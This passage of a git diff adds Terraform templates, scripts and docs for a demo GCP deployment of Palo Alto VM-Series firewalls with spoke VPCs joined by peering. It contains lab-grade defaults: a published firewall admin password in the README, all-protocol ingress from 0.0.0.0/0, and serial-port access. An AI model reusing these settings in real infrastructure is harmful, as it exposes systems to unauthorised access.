b/gcp/adv-peering-with-lbnh/modules/create_vm/main.tf new file mode 100644 index 00000000..dd140b46 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_vm/main.tf @@ -0,0 +1,127 @@ +variable vm_names { + type = "list" +} +variable vm_machine_type {} +variable vm_zones { + type = "list" +} +variable vm_ssh_key {} + +variable vm_image {} +variable vm_subnetworks { + type = "list" +} + +variable vm_scopes { + type = "list" + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + + +variable internal_lb_create { + default = false +} + +variable 
"internal_lb_health_check" { + default = "22" +} + +variable "internal_lb_ports" { + type = "list" + default = ["80"] +} + +variable "internal_lb_name" { + default = "intlb" +} + +variable "internal_lb_ip" { + default = "" +} + +variable create_instance_group { + default = false +} + +variable startup_script { +default = "" +} + + +resource "google_compute_instance" "vm" { + count = "${length(var.vm_names)}" + name = "${element(var.vm_names, count.index)}" + machine_type = "${var.vm_machine_type}" + zone = "${element(var.vm_zones, count.index)}" + can_ip_forward = true + allow_stopping_for_update = true + metadata_startup_script = "${var.startup_script}" + + + metadata { + serial-port-enable = true + sshKeys = "${var.vm_ssh_key}" + } + + network_interface { + subnetwork = "${element(var.vm_subnetworks, count.index)}" + } + + boot_disk { + initialize_params { + image = "${var.vm_image}" + } + } + + service_account { + scopes = "${var.vm_scopes}" + } +} + +resource "google_compute_instance_group" "instance_group" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-group" + zone = "${var.vm_zones[0]}" + + instances = [ + "${google_compute_instance.vm.*.self_link}", + ] +} + + + + +resource "google_compute_health_check" "health_check" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-check-${count.index}" + + tcp_health_check { + port = "${var.internal_lb_ports[0]}" + } +} + +resource "google_compute_region_backend_service" "backend_service" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-backend-${count.index}" + health_checks = ["${google_compute_health_check.health_check.self_link}"] + + backend { + group = "${google_compute_instance_group.instance_group.self_link}" + } +} + + +resource "google_compute_forwarding_rule" "forwarding_rule" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-tcp" + load_balancing_scheme = "INTERNAL" + ip_address = "${var.internal_lb_ip}" + ports = "${var.internal_lb_ports}" + subnetwork = "${var.vm_subnetworks[0]}" + backend_service = "${google_compute_region_backend_service.backend_service.self_link}" +} \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/modules/create_vmseries/main.tf b/gcp/adv-peering-with-lbnh/modules/create_vmseries/main.tf new file mode 100644 index 00000000..8a87285a --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_vmseries/main.tf @@ -0,0 +1,176 @@ +variable fw_subnetworks { + type = "list" +} + +variable fw_names { + type = "list" +} + +variable fw_machine_type {} + +variable fw_zones { + type = "list" +} + +variable fw_cpu_platform { + default = "Intel Skylake" +} + +variable fw_bootstrap_bucket { + default = "" +} + +variable fw_ssh_key {} + +variable public_lb_create { + default = false +} + +variable fw_scopes { + type = "list" + + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable fw_image {} + +variable fw_tags { + type = "list" + default = [] +} + +variable create_instance_group { + default = false +} + +variable instance_group_names { + type = "list" + default = ["vmseries-instance-group"] +} + +variable "dependencies" { + type = "list" + default = [] +} + +variable fw_nic0_ip { + type = "list" + default = [] +} + +variable fw_nic1_ip { + type = "list" + default = [] +} + +variable fw_nic2_ip { + type = 
"list" + default = [] +} + +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +#************************************************************************************ +# CREATE VMSERIES +#*********************************************************************************** +resource "google_compute_instance" "vmseries" { + count = "${length(var.fw_names)}" + name = "${element(var.fw_names, count.index)}" + machine_type = "${var.fw_machine_type}" + zone = "${element(var.fw_zones, count.index)}" + min_cpu_platform = "${var.fw_cpu_platform}" + can_ip_forward = true + allow_stopping_for_update = true + tags = "${var.fw_tags}" + + metadata { + vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}" + serial-port-enable = true + sshKeys = "${var.fw_ssh_key}" + } + + service_account { + scopes = "${var.fw_scopes}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[0]}" + access_config = {} + network_ip = "${element(var.fw_nic0_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[1]}" + access_config = {} + network_ip = "${element(var.fw_nic1_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[2]}" + network_ip = "${element(var.fw_nic2_ip, count.index)}" + } + + boot_disk { + initialize_params { + image = "${var.fw_image}" + } + } + + depends_on = [ + "null_resource.dependency_getter", + ] +} + +#************************************************************************************ +# CREATE INSTANCE GROUP +#************************************************************************************ +resource "google_compute_instance_group" "vmseries" { + count = "${(var.create_instance_group) ? length(var.fw_names) : 0}" + name = "${element(var.instance_group_names, count.index)}" + zone = "${element(var.fw_zones, count.index)}" + instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"] + + named_port { + name = "http" + port = "80" + } +} + + + + + + +#************************************************************************************ +# OUTPUTS +#************************************************************************************ + +output "fw_names" { + value = "${google_compute_instance.vmseries.*.name}" +} + +output "fw_self_link" { + value = "${google_compute_instance.vmseries.*.self_link}" +} + +output "instance_group" { + value = "${google_compute_instance_group.vmseries.*.self_link}" +} + + +output "fw_nic0_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip}" +} + +output "fw_nic1_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}" +} \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/modules/create_vmseries_ilbnh/main.tf b/gcp/adv-peering-with-lbnh/modules/create_vmseries_ilbnh/main.tf new file mode 100644 index 00000000..87300c85 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_vmseries_ilbnh/main.tf @@ -0,0 +1,173 @@ +variable enable_ilbnh { + default = true +} +variable fw_subnetworks { + type = "list" +} + +variable fw_names { + type = "list" +} + +variable fw_machine_type {} + +variable fw_zones { + type = "list" +} + +variable fw_cpu_platform { + default = "Intel Skylake" +} + +variable fw_bootstrap_bucket { + default = "" +} + +variable fw_ssh_key {} + +variable public_lb_create { + default = false +} + +variable fw_scopes { + type = "list" + + default = [ + 
"https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable fw_image {} + +variable fw_tags { + type = "list" + default = [] +} + +variable create_instance_group { + default = false +} + +variable instance_group_names { + type = "list" + default = ["vmseries-instance-group"] +} + +variable "dependencies" { + type = "list" + default = [] +} + +variable fw_nic0_ip { + type = "list" + default = [] +} + +variable fw_nic1_ip { + type = "list" + default = [] +} + +variable fw_nic2_ip { + type = "list" + default = [] +} +variable instance_group { + type = "list" + default = [] +} + +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +#************************************************************************************ +# CREATE VMSERIES +#*********************************************************************************** +resource "google_compute_instance" "vmseries" { + count = "${(length(var.fw_names) > 0 && var.enable_ilbnh) ? length(var.fw_names) : "0" }" + name = "${element(var.fw_names, count.index)}" + machine_type = "${var.fw_machine_type}" + zone = "${element(var.fw_zones, count.index)}" + min_cpu_platform = "${var.fw_cpu_platform}" + can_ip_forward = true + allow_stopping_for_update = true + tags = "${var.fw_tags}" + + metadata { + vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}" + serial-port-enable = true + sshKeys = "${var.fw_ssh_key}" + } + + service_account { + scopes = "${var.fw_scopes}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[0]}" + access_config = {} + network_ip = "${element(var.fw_nic0_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[1]}" + access_config = {} + network_ip = "${element(var.fw_nic1_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[2]}" + access_config = {} + network_ip = "${element(var.fw_nic2_ip, count.index)}" + } + + boot_disk { + initialize_params { + image = "${var.fw_image}" + } + } + + depends_on = [ + "null_resource.dependency_getter", + ] +} + +#************************************************************************************ +# CREATE INSTANCE GROUP +#************************************************************************************ +resource "google_compute_instance_group" "vmseries" { + count = "${(var.create_instance_group && var.enable_ilbnh) ? 
length(var.fw_names) : 0}" + name = "${element(var.instance_group_names, count.index)}" + zone = "${element(var.fw_zones, count.index)}" + instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"] +} + +#************************************************************************************ +# OUTPUTS +#************************************************************************************ + +output "fw_names" { + value = "${google_compute_instance.vmseries.*.name}" +} + +output "fw_self_link" { + value = "${google_compute_instance.vmseries.*.self_link}" +} + +output "instance_group" { + value = "${concat(google_compute_instance_group.vmseries.*.self_link, list(""), list(""))}" +} + +output "fw_nic0_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip}" +} + +output "fw_nic1_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}" +} diff --git a/gcp/adv-peering-with-lbnh/modules/create_vpc/main.tf b/gcp/adv-peering-with-lbnh/modules/create_vpc/main.tf new file mode 100644 index 00000000..e4511595 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_vpc/main.tf @@ -0,0 +1,71 @@ +variable vpc_name {} + +variable subnetworks { + type = "list" +} + +variable ip_cidrs { + type = "list" +} + +variable regions { + type = "list" +} + +variable ingress_allow_all { + default = true +} + +variable ingress_sources { + type = "list" + default = ["0.0.0.0/0"] +} + +resource "google_compute_network" "default" { + name = "${var.vpc_name}" + auto_create_subnetworks = false +} + +resource "google_compute_subnetwork" "default" { + count = "${length(var.subnetworks)}" + name = "${element(var.subnetworks, count.index)}" + ip_cidr_range = "${element(var.ip_cidrs, count.index)}" + region = "${element(var.regions, count.index)}" + network = "${google_compute_network.default.self_link}" +} + +resource "google_compute_firewall" "ingress_all" { + count = "${var.ingress_allow_all}" + name = "${google_compute_network.default.name}-ingress-all" + network = "${google_compute_network.default.self_link}" + direction = "INGRESS" + source_ranges = "${var.ingress_sources}" + + allow { + protocol = "all" + } +} + +output "subnetwork_id" { + value = "${google_compute_subnetwork.default.*.id}" +} + +output "subnetwork_name" { + value = "${google_compute_subnetwork.default.*.name}" +} + +output "subnetwork_self_link" { + value = "${google_compute_subnetwork.default.*.self_link}" +} + +output "vpc_name" { + value = "${google_compute_network.default.*.name}" +} + +output "vpc_id" { + value = "${google_compute_network.default.*.id[0]}" +} + +output "vpc_self_link" { + value = "${google_compute_network.default.*.self_link[0]}" +} diff --git a/gcp/adv-peering-with-lbnh/outputs.tf b/gcp/adv-peering-with-lbnh/outputs.tf new file mode 100644 index 00000000..28bd734c --- /dev/null +++ b/gcp/adv-peering-with-lbnh/outputs.tf @@ -0,0 +1,52 @@ +#************************************************************************************ +# OUTPUTS +#************************************************************************************ +output " IMPORTANT!! PLEASE READ!! 
" { + value = [ + "===================================================================================", + "Before proceeding, you must enable import/export custom routes on all peering links", + "and remove the default (0.0.0.0/0) route from TRUST, SPOKE1, and SPOKE2 VPCs", + "There is also a need to create a default route in the ilb-trust-subnet pointing to", + "the internal load balancer", + "==================================================================================="] +} +output "GLB-ADDRESS " { + value = "http://${module.vmseries_public_lb.address}" +} + +output "MGMT-URL-FW1 " { + value = "https://${module.vm_fw.fw_nic1_public_ip[0]}" +} + +output "MGMT-URL-FW2 " { + value = "https://${module.vm_fw.fw_nic1_public_ip[1]}" +} +output "MGMT-URL-ILB-FW3 " { + value = "https://${module.vm_fw_ilbnh.fw_nic1_public_ip[0]}" +} + +output "MGMT-URL-ILB-FW4 " { + value = "https://${module.vm_fw_ilbnh.fw_nic1_public_ip[1]}" +} +output "SSH-SPOKE1-VM1-FW1" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 221 -i " +} + +output "SSH-SPOKE1-VM2-FW1" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 222 -i " +} + +output "SSH-SPOKE2-FW1" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 223 -i " +} + +output "SSH-SPOKE1-VM1-FW2" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 221 -i " +} +output "SSH-SPOKE1-VM2-FW2" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 222 -i " +} + +output "SSH-SPOKE2-FW2" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 223 -i " +} diff --git a/gcp/adv-peering-with-lbnh/scripts/showheaders.php b/gcp/adv-peering-with-lbnh/scripts/showheaders.php new file mode 100644 index 00000000..19c37318 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/scripts/showheaders.php @@ -0,0 +1,62 @@ + + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/gcp/adv-peering-with-lbnh/scripts/webserver-startup.sh b/gcp/adv-peering-with-lbnh/scripts/webserver-startup.sh new file mode 100644 index 00000000..3576db4e --- /dev/null +++ b/gcp/adv-peering-with-lbnh/scripts/webserver-startup.sh @@ -0,0 +1,8 @@ +#!/bin/bash +until sudo apt-get update; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done +until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done +until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done +until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done diff --git a/gcp/adv-peering-with-lbnh/spoke1.tf b/gcp/adv-peering-with-lbnh/spoke1.tf new file mode 100644 index 00000000..7cae884c --- /dev/null +++ b/gcp/adv-peering-with-lbnh/spoke1.tf @@ -0,0 +1,79 @@ +provider "google" { + credentials = "${var.spoke1_project_authfile}" + project = "${var.spoke1_project}" + region = "${var.region}" + alias = "spoke1" +} + +#************************************************************************************ +# CREATE SPOKE1 VPC & SPOKE1 VMs (w/ INTLB) +#************************************************************************************ +module "vpc_spoke1" { + source = "./modules/create_vpc/" + vpc_name = "spoke1-vpc" + subnetworks = ["spoke1-subnet"] + ip_cidrs = ["10.10.1.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] + + providers = { + google = "google.spoke1" + } +} + +module "vm_spoke1" { + source = "./modules/create_vm/" + vm_names = ["spoke1-vm1", "spoke1-vm2"] + vm_zones = ["${var.region}-a", "${var.region}-a"] + vm_machine_type = "f1-micro" + vm_image = "ubuntu-os-cloud/ubuntu-1604-lts" + vm_subnetworks = ["${module.vpc_spoke1.subnetwork_self_link[0]}", "${module.vpc_spoke1.subnetwork_self_link[0]}"] + vm_ssh_key = "ubuntu:${var.ubuntu_ssh_key}" + startup_script = "${file("${path.module}/scripts/webserver-startup.sh")}" // default "" - runs no startup script + + internal_lb_create = true // default false + internal_lb_name = "spoke1-intlb" // default "intlb" + internal_lb_ports = ["80", "443"] // default ["80"] + internal_lb_ip = "10.10.1.100" // default "" (assigns an any available IP in subnetwork ) + + providers = { + google = "google.spoke1" + } +} + +#************************************************************************************ +# CREATE PEERING LINK SPOKE1-to-TRUST +#************************************************************************************ +resource "google_compute_network_peering" "spoke1_to_trust" { + name = "spoke1-to-trust" + network = "${module.vpc_spoke1.vpc_self_link}" + peer_network = "${module.vpc_trust.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.ilb_trust_to_spoke2", + ] + provider = "google.spoke1" +} +#************************************************************************************ +# CREATE PEERING LINK SPOKE1-to-ilb-TRUST +#************************************************************************************ +resource "google_compute_network_peering" "spoke1_to_ilb_trust" { + name = "spoke1-to-ilb-trust" + network = "${module.vpc_spoke1.vpc_self_link}" + peer_network = 
"${module.ilb_trust.vpc_self_link}" + + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.spoke1_to_trust", + ] + provider = "google.spoke1" +} \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/spoke2.tf b/gcp/adv-peering-with-lbnh/spoke2.tf new file mode 100644 index 00000000..591bdb24 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/spoke2.tf @@ -0,0 +1,72 @@ +provider "google" { + credentials = "${var.spoke2_project_authfile}" + project = "${var.spoke2_project}" + region = "${var.region}" + alias = "spoke2" +} + +#************************************************************************************ +# CREATE SPOKE2 VPC & SPOKE2 VM +#************************************************************************************ +module "vpc_spoke2" { + source = "./modules/create_vpc/" + vpc_name = "spoke2-vpc" + subnetworks = ["spoke2-subnet"] + ip_cidrs = ["10.10.2.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] + + providers = { + google = "google.spoke2" + } +} + +module "vm_spoke2" { + source = "./modules/create_vm/" + vm_names = ["spoke2-vm1"] + vm_zones = ["${var.region}-a"] + vm_machine_type = "f1-micro" + vm_image = "ubuntu-os-cloud/ubuntu-1604-lts" + vm_subnetworks = ["${module.vpc_spoke2.subnetwork_self_link[0]}"] + vm_ssh_key = "ubuntu:${var.ubuntu_ssh_key}" + + providers = { + google = "google.spoke2" + } +} + +#************************************************************************************ +# CREATE PEERING LINK SPOKE2-to-TRUST +#************************************************************************************ +resource "google_compute_network_peering" "spoke2_to_trust" { + name = "spoke2-to-trust" + network = "${module.vpc_spoke2.vpc_self_link}" + peer_network = "${module.vpc_trust.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.spoke1_to_ilb_trust", + ] + provider = "google.spoke2" +} +#************************************************************************************ +# CREATE PEERING LINK SPOKE2-to-ilb-TRUST +#************************************************************************************ +resource "google_compute_network_peering" "spoke2_to_ilb_trust" { + name = "spoke2-to-ilb-trust" + network = "${module.vpc_spoke2.vpc_self_link}" + peer_network = "${module.ilb_trust.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.spoke2_to_trust", + ] + provider = "google.spoke2" +} diff --git a/gcp/adv-peering-with-lbnh/variables.tf b/gcp/adv-peering-with-lbnh/variables.tf new file mode 100644 index 00000000..0b4fda73 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/variables.tf @@ -0,0 +1,70 @@ +#************************************************************************************ +# GCP VARIABLES +#************************************************************************************ +variable enable_ilbnh { + default = true +} + +variable "region" { + default = "us-central1" +} + +#************************************************************************************ +# main.tf PROJECT ID & AUTHFILE +#************************************************************************************ +variable "main_project" { + description = "Existing project ID for main project (all resources deployed in main.tf)" + default = "ilb-2019" +} + +variable "main_project_authfile" { + description = "Authentication file for main 
project (all resources deployed in main.tf)"
+  default     = "/Users/dspears/GCP/ilb-2019-key.json"
+}
+
+#************************************************************************************
+# spoke1.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "spoke1_project" {
+  description = "Existing project for spoke1 (can be the same as the main project)."
+  default     = "ilb-2019"
+}
+
+variable "spoke1_project_authfile" {
+  description = "Authentication file for spoke1 project (all resources deployed in spoke1.tf)"
+  default     = "/Users/dspears/GCP/ilb-2019-key.json"
+}
+
+#************************************************************************************
+# spoke2.tf PROJECT ID & AUTHFILE
+#************************************************************************************
+variable "spoke2_project" {
+  description = "Existing project for spoke2 (can be the same as the main project)."
+  default     = "ilb-2019"
+}
+
+variable "spoke2_project_authfile" {
+  description = "Authentication file for spoke2 project (all resources deployed in spoke2.tf; can be the same file as the main project's)"
+  default     = "/Users/dspears/GCP/ilb-2019-key.json"
+}
+
+#************************************************************************************
+# VMSERIES SSH KEY & IMAGE (not required if bootstrapping)
+#************************************************************************************
+variable "vmseries_ssh_key" {
+  default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAXsXFhJABLkPEsF2NC/oLJ5sj/cZDXso+qPy30nllU5w== davespears@gmail.com"
+}
+
+#************************************************************************************
+# UBUNTU SSH KEY
+#************************************************************************************
+variable "ubuntu_ssh_key" {
+  default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAXsXFhJABLkPEsF2NC/oLJ5sj/cZDXso+qPy30nllU5w== davespears@gmail.com"
+}
+
+variable "vmseries_image" {
+  # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-814"
+  default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-814"
+
+  # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-814"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/README.md b/gcp/adv_peering_2fw_2spoke/README.md
new file mode 100644
index 00000000..40a0f00a
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/README.md
@@ -0,0 +1,72 @@
+## 2 x VM-Series / 2 x Spoke VPCs via Advanced Peering
+Terraform creates 2 VM-Series firewalls that secure ingress/egress traffic for 2 spoke VPCs. The spoke VPCs are connected (via VPC Peering) to the VM-Series trust VPC. After the build completes, several manual changes must be performed to enable transitive routing; they are manual because they cannot yet be performed through Terraform.
+
+### Overview
+* 5 x VPCs (mgmt, untrust, trust, spoke1, & spoke2) with the relevant peering connections
+* 2 x VM-Series (BYOL / Bundle1 / Bundle2)
+* 2 x Ubuntu VMs in spoke1 VPC (Apache installed during creation)
+* 1 x Ubuntu VM in spoke2 VPC
+* 1 x GCP Public Load Balancer (VM-Series as backend)
+* 1 x GCP Internal Load Balancer (spoke1 VMs as backend)
+* 1 x GCP Storage Bucket for VM-Series bootstrapping (a random string is appended to the bucket name for global uniqueness)
+
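+For orientation, the hub-and-spoke wiring above comes down to pairs of `google_compute_network_peering` resources, one per direction, which is how the main.tf and spoke templates in this change express it. A trimmed sketch of that pattern (resource and module names follow main.tf; the spoke side is assumed to mirror the lbnh variant's spoke1.tf):
+
+```
+# Hub side (main.tf): peer the firewalls' trust VPC to spoke1.
+resource "google_compute_network_peering" "trust_to_spoke1" {
+  name         = "trust-to-spoke1"
+  network      = "${module.vpc_trust.vpc_self_link}"
+  peer_network = "${module.vpc_spoke1.vpc_self_link}"
+}
+
+# Spoke side (spoke1.tf): the reverse direction, created under the spoke project's provider alias.
+resource "google_compute_network_peering" "spoke1_to_trust" {
+  name         = "spoke1-to-trust"
+  network      = "${module.vpc_spoke1.vpc_self_link}"
+  peer_network = "${module.vpc_trust.vpc_self_link}"
+  provider     = "google.spoke1"
+}
+```
+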
+
+
+
+### Prerequisites
+1. Terraform
+2. Access to GCP Console
+
+After deployment, the firewalls' username and password are:
+ * **Username:** paloalto
+ * **Password:** Pal0Alt0@123
+
+### Deployment
+1. Download the **adv_peering_2fw_2spoke** repo to the machine running the build
+2. In an editor, open **variables.tf** and set values for the following variables (alternatively, supply them in a `terraform.tfvars` file as sketched after step 3)
+
+| Variable | Description |
+| :------------- | :------------- |
+| `main_project` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer |
+| `main_project_authfile` | Authentication key file for main_project |
+| `spoke1_project` | Project ID for spoke1 VMs, VPC, & internal load balancer |
+| `spoke1_project_authfile` | Authentication key file for spoke1_project |
+| `spoke2_project` | Project ID for spoke2 VM & VPC |
+| `spoke2_project_authfile` | Authentication key file for spoke2_project |
+| `ubuntu_ssh_key` | Public key used to authenticate to the Ubuntu VMs (**the user must be ubuntu**) |
+| `vmseries_image` | Uncomment the VM-Series license you want to deploy |
+
+3. Download the project authentication key files to the main directory of the Terraform build.
+
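+If you would rather not edit the defaults in **variables.tf**, the same settings can be supplied in a `terraform.tfvars` file in the build directory. A minimal sketch with placeholder values only (the variable names are assumed to match this directory's variables.tf, which follows the naming used elsewhere in this change, e.g. `main_project_authfile`):
+
+```
+main_project            = "my-main-project-id"
+main_project_authfile   = "main-project-key.json"
+spoke1_project          = "my-spoke1-project-id"
+spoke1_project_authfile = "spoke1-project-key.json"
+spoke2_project          = "my-spoke2-project-id"
+spoke2_project_authfile = "spoke2-project-key.json"
+ubuntu_ssh_key          = "ssh-rsa AAAA...your-public-key... ubuntu@example"
+vmseries_ssh_key        = "ssh-rsa AAAA...your-public-key... admin@example"
+```
+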

+
+ +4. Execute Terraform +``` +$ terraform init +$ terraform plan +$ terraform apply +``` + +5. After deployment finishes, for EACH PEER, enable **Import custom routes** & **Export custom routes** + +
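+As an aside, newer releases of the Google provider can set these flags directly on the peering resource through the `export_custom_routes` / `import_custom_routes` arguments; this template predates those arguments, which is why the step is manual here. A sketch of what that would look like (argument names from the newer provider, not used by this build):
+
+```
+resource "google_compute_network_peering" "trust_to_spoke1" {
+  name                 = "trust-to-spoke1"
+  network              = "${module.vpc_trust.vpc_self_link}"
+  peer_network         = "${module.vpc_spoke1.vpc_self_link}"
+  export_custom_routes = true
+  import_custom_routes = true
+}
+```
+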

+
+
+6. Remove the default (0.0.0.0/0) GCP route from the spoke1-vpc, spoke2-vpc, & trust-vpc networks
+
+
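+For reference, the replacement 0.0.0.0/0 route in the trust VPC is already created by this template's main.tf (shown below); once the auto-created default routes are deleted and custom routes are exported/imported across the peerings, the spoke VPCs send their default traffic to the VM-Series over the peering.
+
+```
+resource "google_compute_route" "default" {
+  count             = "${length(module.vm_fw.fw_names)}"
+  name              = "default-to-${module.vm_fw.fw_names[count.index]}"
+  dest_range        = "0.0.0.0/0"
+  network           = "${module.vpc_trust.vpc_self_link}"
+  next_hop_instance = "${module.vm_fw.fw_self_link[count.index]}"
+  priority          = 100
+}
+```
+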

+
+
+7. From the Terraform output, open the `GLB-ADDRESS` URL (http://...) in a web browser. NOTE: it may take several minutes for the spoke1 VMs to finish installing Apache & PHP.
+

+
+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes b/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml b/gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml similarity index 84% rename from gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml rename to gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml index 5f91248d..cceeb051 100644 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml +++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml @@ -136,32 +136,7 @@ no - Allow-HTTPS - - - - - - - - no - - - - - no - - - yes - - - no - - 1460 - - no - - Allow-HTTPS + mgmt-profile @@ -175,12 +150,10 @@ - - - - - + yes + yes + yes @@ -341,11 +314,19 @@ + + no + + + no + + + no + ethernet1/1 ethernet1/2 - ethernet1/3 @@ -357,7 +338,7 @@ - 10.5.1.1 + 192.168.1.1 None @@ -370,41 +351,44 @@ ethernet1/1 10 0.0.0.0/0 + + + - - - 10.5.2.1 - - - None - + no any 2 + + 192.168.2.1 + + + None + ethernet1/2 10 - 10.5.2.0/24 + 10.10.1.0/24 - + no any 2 - 10.5.3.1 + 192.168.2.1 None - ethernet1/3 + ethernet1/2 10 - 10.5.3.0/24 + 10.10.2.0/24 @@ -421,11 +405,20 @@ - + download-and-install - + 15 + + + + + download-and-install + 30 + + + US/Pacific @@ -443,7 +436,7 @@ yes no - no + yes no @@ -461,18 +454,17 @@ DO NOT USE FOR PRODUCTION FQDN - 